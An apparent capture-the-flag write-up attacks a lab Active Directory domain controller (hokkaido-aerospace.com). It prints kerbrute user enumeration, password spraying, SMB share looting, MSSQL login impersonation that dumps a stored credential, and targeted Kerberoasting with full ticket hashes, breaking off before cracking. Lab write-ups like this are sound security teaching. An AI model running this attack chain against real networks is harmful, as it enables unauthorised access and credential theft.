5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8530/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: 403 - Forbidden: Access is denied.
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
8531/tcp open unknown syn-ack ttl 125
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
47001/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49684/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49691/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49712/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
58538/tcp open ms-sql-s syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 192.168.135.40:58538:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 58538
|_ssl-date: 2024-10-19T05:11:47+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-02T02:13:54
| Not valid after: 2054-08-02T02:13:54
| MD5: 594a:702f:d421:ff2f:411d:d1ea:73f1:2c3f
| SHA-1: f4ad:4152:6a70:f50b:ec47:5026:400f:8ffb:0dc3:5178
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQLhWUI307A4ROtwMgh+8WuDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjQwODAyMDIxMzU0WhgPMjA1NDA4MDIwMjEzNTRaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJOM/LlJ
| n7WRALHhPH9JpPOUCprXzepna4LoyPFu7jf3ndos/OXkWEmhJXWbOmRgoBg+MYb9
| FcoA6cdcPQYVQMQ9sYIm9RnlwnpYHzdBCamVX9GEOcB7g05fJED+IDzZyIZSlvRb
| BJfUOJsHC47hkZuDSM8pucGG4aYwrLrqmH59xt4FfHnneSa7FIE0UTrtDQHuEiAa
| rmTSdS5VotclR99upSYGnySGgxeE4rojdz6RoCZO7MfVRKxuq2jzwyAw4KTrbDb5
| innLtClsPryZwnT/xwxY6JUmA2i9/0GKM9bphQXu4eWC23fhCh+Ej1lLeB1x6duS
| 0OcUD9ViEIaAIX0CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAHbiMlU++aiHToJuF
| ECtOjqW4vlEq9VKI57Q1CtsFfCxTsY4fSnS+0lylxOReAfU6GnXaIkAq1VSEml7r
| RBo6bYWxYwDWrmy4RoHBHzE2DKYfq8x7i09uDQ3E2ndWE83k2wbyJ6aXMld120D7
| 73S1hCFppHJwqBqjvOFr+HePxMG8XT4YXZvFjtgiL2cvPoAc4swU1VlMeFfPRrve
| 6D442eQMd+tVckMrS/3p9AavbUGwwyFUDgPS2pp3e4A/pQdPMN91gvoVaguWKY4J
| lAbWPCd5UKPsIz3QS/lXivFtCLBSkxsqlM6/dF1mIMfHMECyxL4esBifdGqYcnt5
| p9exOQ==
|_-----END CERTIFICATE-----
| ms-sql-ntlm-info:
| 192.168.135.40:58538:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
|_ Product_Version: 10.0.20348
I usually started out with port 80 but there’s nothing interesting. I also looked into other potential port but nothing seems to be useful. I then look into port 88 to get some potential username first.
Port 88
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
./kerbrute_linux_386 userenum /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc 192.168.135.40 -d hokkaido-aerospace.com
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/19/24 - Ronnie Flathers @ropnop
2024/10/19 13:17:25 > Using KDC(s):
2024/10/19 13:17:25 > 192.168.135.40:88
2024/10/19 13:17:25 > [+] VALID USERNAME: info@hokkaido-aerospace.com
2024/10/19 13:17:28 > [+] VALID USERNAME: administrator@hokkaido-aerospace.com
2024/10/19 13:17:30 > [+] VALID USERNAME: INFO@hokkaido-aerospace.com
2024/10/19 13:17:38 > [+] VALID USERNAME: Info@hokkaido-aerospace.com
2024/10/19 13:17:48 > [+] VALID USERNAME: discovery@hokkaido-aerospace.com
2024/10/19 13:17:48 > [+] VALID USERNAME: Administrator@hokkaido-aerospace.com
2024/10/19 13:21:45 > [+] VALID USERNAME: maintenance@hokkaido-aerospace.com
I managed to get some potential username by using kerbrute. Now that I have username, I tried to just use common password such as rockyou.txt and also reusing username as password.
1
2
3
netexec ldap 192.168.135.40 -u user -p user
SMB 192.168.135.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
LDAP 192.168.135.40 389 DC [+] hokkaido-aerospace.com\info:info
Since I have access to ldap, I tried to get more information by utilizing bloodhound-python first.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
bloodhound-python -d 'hokkaido-aerospace.com' -u 'info' -p 'info' -ns 192.168.135.40 -c All --zip
INFO: Found AD domain: hokkaido-aerospace.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.hokkaido-aerospace.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.hokkaido-aerospace.com
INFO: Found 34 users
INFO: Found 62 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: dc.hokkaido-aerospace.com
INFO: Done in 00M 03S
INFO: Compressing output into 20241019134205_bloodhound.zip
After that, time to import to bloodhound and have a quick look.
After having a quick look, it seems like my current user is not that useful. Time to continue other port first.
Port 139/445
Since Ldap works, I assume smb would also work.
1
2
3
netexec smb 192.168.135.40 -u user -p user
SMB 192.168.135.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB 192.168.135.40 445 DC [+] hokkaido-aerospace.com\info:info
Since the cred works, I have a look at what share drive I have.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
smbmap -H 192.168.135.40 -u info -p info
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.40:445 Name: hokkaido-aerospace.com Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
homes READ, WRITE user homes
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
UpdateServicesPackages READ ONLY A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent READ ONLY A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
[*] Closed 1 connections
It seems like I have read access to some drive. After going through, I noticed some interesting information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
smbmap -H 192.168.135.40 -u info -p info -r homes
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.40:445 Name: hokkaido-aerospace.com Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
homes READ, WRITE user homes
./homes
dr--r--r-- 0 Sat Oct 19 14:08:12 2024 .
dr--r--r-- 0 Sat Oct 19 13:01:32 2024 ..
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Angela.Davies
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Annette.Buckley
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Anthony.Anderson
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Catherine.Knight
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Charlene.Wallace
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Cheryl.Singh
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Deborah.Francis
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Declan.Woodward
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Elliott.Jones
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Gordon.Brown
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Grace.Lees
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Hannah.O'Neill
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Irene.Dean
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Julian.Davies
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Lynne.Tyler
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Molly.Edwards
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Rachel.Jones
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Sian.Gordon
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Tracy.Wood
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Victor.Kelly
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
UpdateServicesPackages READ ONLY A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent READ ONLY A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
[*] Closed 1 connections
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
smbmap -H 192.168.135.40 -u info -p info -r NETLOGON --depth 2
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.40:445 Name: hokkaido-aerospace.com Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
homes READ, WRITE user homes
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
./NETLOGON
dr--r--r-- 0 Sat Nov 25 21:40:08 2023 .
dr--r--r-- 0 Sat Nov 25 21:17:33 2023 ..
dr--r--r-- 0 Wed Dec 6 23:44:26 2023 temp
./NETLOGON//temp
dr--r--r-- 0 Wed Dec 6 23:44:26 2023 .
dr--r--r-- 0 Sat Nov 25 21:40:08 2023 ..
fr--r--r-- 27 Wed Dec 6 23:44:26 2023 password_reset.txt
SYSVOL READ ONLY Logon server share
UpdateServicesPackages READ ONLY A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent READ ONLY A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
[*] Closed 1 connections
It seems like there’s alot of potential username and a potential password file. I then save the username and download the password_reset.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
smbmap -H 192.168.135.40 -u info -p info --download 'NETLOGON/temp/password_reset.txt'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: NETLOGON\temp\password_reset.txt (27 bytes)
[+] File output to: /root/pg/Hokkaido/192.168.135.40-NETLOGON_temp_password_reset.txt
[*] Closed 1 connections
cat 192.168.135.40-NETLOGON_temp_password_reset.txt
Initial Password: Start123!
Now that I have a new password and bunch of username, time to spray again.
1
2
3
4
5
6
7
netexec ldap 192.168.135.40 -u user -p 'Start123!'
SMB 192.168.135.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\info:Start123!
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\administrator:Start123!
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\INFO:Start123!
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\Info:Start123!
LDAP 192.168.135.40 389 DC [+] hokkaido-aerospace.com\discovery:Start123!
Another new user. Time to look into bloodhound again to see what this user could do. I could not get any useful information there so I decided to just spray other services as well.
1
2
3
netexec mssql 192.168.135.40 -u discovery -p 'Start123!'
MSSQL 192.168.135.40 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)
MSSQL 192.168.135.40 1433 DC [+] hokkaido-aerospace.com\discovery:Start123!
Time to have a look at mssql port.
Port 1433
1
2
3
4
5
6
7
8
9
10
11
12
13
impacket-mssqlclient hokkaido-aerospace.com/discovery:'Start123!'@192.168.135.40 -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (HAERO\discovery guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
The first thing I tried when accessed the services is trying to enable command shell so that I could execute command but it seems like I don’t have the permission. I then look into things that I have such as database.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
SQL (HAERO\discovery guest@master)> enum_db
name is_trustworthy_on
------- -----------------
master 0
tempdb 0
model 0
msdb 1
hrappdb 0
SQL (HAERO\discovery guest@master)> use hrappdb
ERROR: Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.
It seems like there’s a database hrappdb that looks interesting but I don’t have the access to the database. I then check if I could impersonate enother user in the database.
1
2
3
4
SQL (HAERO\discovery guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- -------------- --------------
b'LOGIN' b'' IMPERSONATE GRANT HAERO\services hrappdb-reader
It seems like I could impersonate user hrappdb-reader. I then try to impersonate the user and hope to gain access to hrappdb database.
1
2
3
4
5
6
7
8
9
10
11
12
13
SQL (HAERO\discovery guest@master)> execute as login = 'hrappdb-reader'
SQL (hrappdb-reader guest@master)> use hrappdb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.
SQL (hrappdb-reader hrappdb-reader@hrappdb)> SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';
TABLE_NAME
----------
sysauth
SQL (hrappdb-reader hrappdb-reader@hrappdb)> select * from sysauth;
id name password
-- ---------------- ----------------
0 b'hrapp-service' b'Untimed$Runny'
I managed to impersonate a new user and get a credential from the database. Time to check bloodhound again for potential information.
The user hrapp-service hash GenericWrite permission to hazel.green which mean I could attempt targeted kerberoast attack according to bloodhound. I’ll be using targetKerberoast.py to perform this technique.
1
2
3
4
5
6
7
8
9
10
11
python targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Hazel.Green)
[+] Printing hash for (Hazel.Green)
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/Hazel.Green*$3bf76c903da0babcf1c26d7b783c9ca4$fbfa63b0023803273551aecf9b75e038d58839302f1bce5acb60967078c62520788431315797c2e6ee4769344376b093015b99eabc73879cc31aff1f2032949dde541733a11c9af6a3fdee4d92f226966d5411a07b5b2e2b81dc5a5ffe388988be93378b5de975d798cfc860d85e7ef8a7f6988174deff51363c073ced7de3a972c6d86506a31ee971df358eac07b8aa3b8e2f244e6c11c0118bd39b6051d8a6de48fa423e9cdaa1a161aa88078746c500525a5585062eef0060b5ce08e58a6d34c16709f20098ce5a64eb63a609eec2c745d363f7793866cbdbd0d0524902d6045bc09c0415978647b91d5df4084d173196e1a8c180e8e5ba766de8151083667d033de8ecd9436fe7f6cab30d7d92a28e017e0e630a38f8cf9eeef73315c45330fb3ae90163321dc50666d58de2240dd0325a7471b0a767f21ac2ccf97cdc0634c507fe2f93bfee045389cebe389a64630eea3026c1a844af440e5724524f4c8f175ec4dc317b313744cc62c6e716755c6eaf863a0dd53d2f075f52f38cb1827fec22587b7f62aa8c81a8bfbe7ba1b71cea3f5beaefc0815513f208bee68bb4d7f315dbcc7a4fa4e200a900f4d21484025d48f6a662e5d07f0ff3562f75176aaf0e83afb4e74003e1d0858c4b10a0409723de22868d5a71960dfe77f72dd3c1539a5e5315bf1c8669569ee01e51acf9deeb2dd3cf2b003c3b754eca764bb015cb2e6aaadfa9c05222b8fcd3fd398ffa44d3cbd51f2042d0b410ff0119b26efa7f152ca092b1ca30195afd00a1bb38681247c24142da4a27d3c55157db1153e44d181af6638636e8b1cd9929fedc31a8d01e6f1f2eb1b8ceffcbb20f5d12ced01f272eba910e71e3af77c2d9a204f1b84601ae9952731f5b8a47626e6d710c79caab3868f8525d8a7a56ca68507549cf287313a67345505c0c575069d6c40ae8181044cff9d2bb7b762379aced7941ace4cc8490c4f9fb1f81ee42b245b487505eea3c295f01ba3728ca481efba7911f7f3150d29214ea990396c119d5ab76d7a72f919c9afabd93a1928944e9f970bcbd690ddd3b1139d61de2636b2b03277038b7bd210d74c94e485e48f4f08aba46f487139eeed68bdebb920fb44715c9af75aa46c1d64bcd97ec82c3ea2416a66ece1da4855c4b6aaf97f8bccbf7042b28900d2e4da34d061320b97dc163c6991270dd843b27520baccb99aafe148c98443e34af3acd03a85290848ce946665bc4c2818d453adaedb5bd115587c1713db5f814a2d8594ddb900a694432a8eec955153d2f6d018c948993cca8038855e0e5d0ad0e741002640bb99c05e2ef218b4429d5b02f85d7a7f25ec3fcbc0643bc64be03f25d7ba6e49d7bba09d2a9147fae03ecc0345c41fd669f574f6bd914fecddf1e8329771c3bc5b9ffb5160a5c59815a16794476b8a81a5fe2df0f7f1cd1a7fcf4fb970584a96a64dca4b20bc868feedf676cdb5769a56210c057bef4a2299e61cc2109324b305a8c83f73b68f1d3e9006646e7480daf00ea9d969ad479a0da1e57ada5e7a23818eba4686532bdf2ad61386f02f427aa6d2184baa45a571aa8785755a1c5d9620f9bdeaafde6ac555fe8ebbd4340ebefeaad107d3664ab68ddef04aef0efbccd2cea83aa0
[VERBOSE] SPN removed successfully for (Hazel.Green)
[+] Printing hash for (discovery)
$krb5tgs$23$*discovery$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/discovery*$b1039309385c477097a249a92d9d05a8$033df905d49c5185623fd7592c2dd8108c17abae89f9c81c1084be288bbd0432f02506bbc1f5a1e195d606d52cc89330a75caeed9bd89fcc32c9658fc82c2f827002b32f97dda9c99579146fcd1d68958c9da71b58f2494d55d4568b569d003abbaa5c67a73cd7999881bf68bf54222b1ed562cfefaa179c17a2d9c3c01314509b3393ad567f6f87a18c6ddf104ee9a22b8b6f1424d989b3f329a950c169acc491db3f2f07628c8747cb047b83fb01ef2f7a88f957be17278410b6f504b8ec7f4901897b4b254e3cc0d37b6f40d19856cb417e3c54756aac6127fa37780838cc580aaa7f9bb21ed16293884b1b25490e525150f9c69ce33c0945316ccf1c02417e93fa30c54fca505f42dfe1912ab096fc74ee4604ed5690b9ae8e980d8c8dc0bbe94586b7ee542f71a9f6d10d5d2b73444d5e8808ccc07e66920422ce91cdf5a4b3d9bad5a7c27a7aab6e2c6083972ca7512679c66373b73b1865af9ccafd3c4211e0b3cbb592e576928c939428dd6e2f8a728365e620ec3ed8e35631caddbcf2a904d463ba2c72958cd27b07487b50e84e0c588e99af9d1038ac9b8116af0da04f5fb4c884804b66fa8acb94a14e1dfff794999da8363ab2234304ac5af0d7614d134681decc66a45dd241e5f352efb9c578160823e5af94ad23dc362f052a90bba39830d860d746854f383cef864f75a532601a840258a068a40475aa389c84676cd45bca8454e7ea789cf8f2e212dd7b3e88fe582f31eb2848706a3d24c479a2f756eb7eafacb3f8dd68951aa1f0eb47906bdd87930c3a9641a0997fc52932d221bfbda19fa363683baeb3dc5d6b08281952104529e87150a9f0dc0d661b20cd11a10bd76dc83a9a371c57324c25b0d3a916f98ae4aaa3ef4bf723d73c26519b98d5036f3d01c476ccf79662f34bfa1e8b9189c5af02655477efa476ac169afac55deb09d4b6c424148c03971bd38ca8dfc2f8a762dff58ddeec35b038a2a942f8008cfb0f2aacb83cf3a1e9c3384deee88a1c3a22984cd317c30c55274a374ea7e33316d92f919be814a52cbd63b63fa669701a4180c7334faa06a5c8e15abdb7d764e82c2d37dbd66ae7c731a6d7f7d6d6fb84544eff09e7742664412bc313387a7a9a56926245b9718ca65c0e1753b8755a9309d344bff7f3e167b0151567771fbaa82d7a1c40693e7492017e8135907cc9bbcd8a20263a91db26d00b852576ebf073201afe3f3cbc76468e574485a67c0c3e4f3a608ea09a993eb6f92361a7e61a083712c55428d615bc06e0375d2f03f230abdcab8c254676136d5731a0d5501d57039216a7308af27e55db5054d7ccf08f8f0e65e95b0eea45a3b53f0a9cf19e3b507d91e8514038d950ad9256e3298147bc23d50580b5fd6af5e4b2a57dc3bbc0df0778a5d5c38992466df35dd7a3d393195a64cacfe1fed305f3195d8d6547d9bb1058b2e99ca26877a69da190879739652571826fbdbd7a43db27336f68c736fd9b8184d58f07a56e69ec9740c785ed408dc6c97047675e972983808ff68fa91635c74d7c51288749664574e0460680c7db50c75e34e5fe0a8f3b7576adf9eb12810cdec4be0347e72b05ec63108144875ab0a435fe8be0fc7d7457ce62f0e7d800f86cae2e
[+] Printing hash for (maintenance)
$krb5tgs$23$*maintenance$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/maintenance*$d133bd7548be53a72fe5d106699f7b5e$b677e027ef6dbc61e6fe2953a6afe793876ab8ad742ee7d54f256198e568d11dfa7f1a02bc68fe8d88e38a294abddf3eeb776e31a5d70023f9d8220422abddae8bd0eea3216645cbbe05d0b84ff74d6bdf44285067a0a600306563f6990c530066ecf3e4bffc3264daed6bebfc46b8c19de8a5f67b706313813036e90617b7909fa4ce104cbe005710badc380ceb96aab511e395fe355927ee40d6ccd66b11701d17659fd1adac3face0fa65d4efdafca68b9a4d78460dfa376770a04c9d44d1db17cff570b6f7dba23658c9f0f6851f13612b42c0e2c9e3bce0eb2aaa8a678a303babb1fb8fcd9e8f777e065c8f1c4a912b92ee79222d09388c4621f2635844918a405c7583e80de9aa589ccabae121a5930b9f1b0b0f0bac4a02ef69d7380cea43a536c95d566353288af6de3a4410fba0c25c6f42f725f52ae03bd574e8bff0810a427f81e3c12804b84436b93763047f07a3591f694a6fd0f133a3b861a40e3a986670deb11d66fcc9eda54a68806827bd9116086f4fd1b04d9cd49416c277557e4726697e7c6d54f581bab99ab2bc8bc31c32ae61c9e99495f9d18fa60fa68a45d4f19af68e04c4922f7ad9061a8126b8382e212aa47933ce226400fc18212904357457e3b3eb2c33c448262ca24260d5256ccf3ab575fc2674315a10b2be38602ef98cb0559132ff6bc83836a71ccb6083b8a93a2f3d806492961b29b4fac85ab0ddfad494188aa2414445d34ff6aad21632e059cca51e4754b4cdc984cbe30ce99f4667efeb73e438d5bf0ac1d1e84f7552ceeff2d2671655f0ab61c598c9a013d5545f4038f6b310868fe5ffeadbe0a0fc0b6c47b379afbd4fc7a567f10ba91b7b7244733c5832b7238330c1a0ff21a77c0e802e35a5353dc2adae2d65699a668a6dc652a807ba906c5b1eb176c82b1df821e72a004c0886ffe1c9d8e9f7c41e7bc511bb892a25a53e168665bf6222d32001a90036ea93662247fed66a3a941ee6895058432f7f5238ec919454300d3fb3b534d8bea8eaaf14bd62cf897e828d9882a63953278b8b2b7ac81e300cb6ed3186598d7e257a1dd8b83b762dac1f8e7de69bd05649fc51163d5eed5b9cf303f58990bb71b2d95663d372a1638c3e65b401d0b303f1775d151ec02571d0644be4a231855f94484705ff7ab80d556130fb3bf1a34dd10a2f3c9e92dd77cc8285dd32860ed8e69a91c5601eaf278849c1181da44b809246a7691e555b21fea2037f27e77d798f8048ecffffda1c84c2ce772f63ace38bd686c3e091e4b2e2cc3dbf0a29d141f1beb1c6e66d3fa19e87e29122503e0579128f6df530cee17f48cf51ef47fbf455d1efded230f5039a3f8c9cd11411c80c65b642001db4b63b9b40a2c4527fce1f7c5e431a39e17d6d56260a4f08fdab991336c971c6d9b9d00555c7eb4dfeca7b926c609cf1e0ed820f94cf47472443f2c97b780a9416c7ee27330fe9944433fec618cbc8e4ac4f4002aaac04b2c0c6a963ae22121b81d230a6bd092b70b8e40deb4b1048217e135e40394fd61230247d9d6d98dc739d14859512722adffeb596526ed5f5704dad6aefeb5f53cc56c969757582ac76bd8a90287ed00f83ca11b1c8bcb4f76fa47cd2c3ebec1342d5e006a43b
I have 3 hashes after using the command that provided by bloodhound. I then try to crack the hash using john.
1
2
3
4
5
6
7
8
9
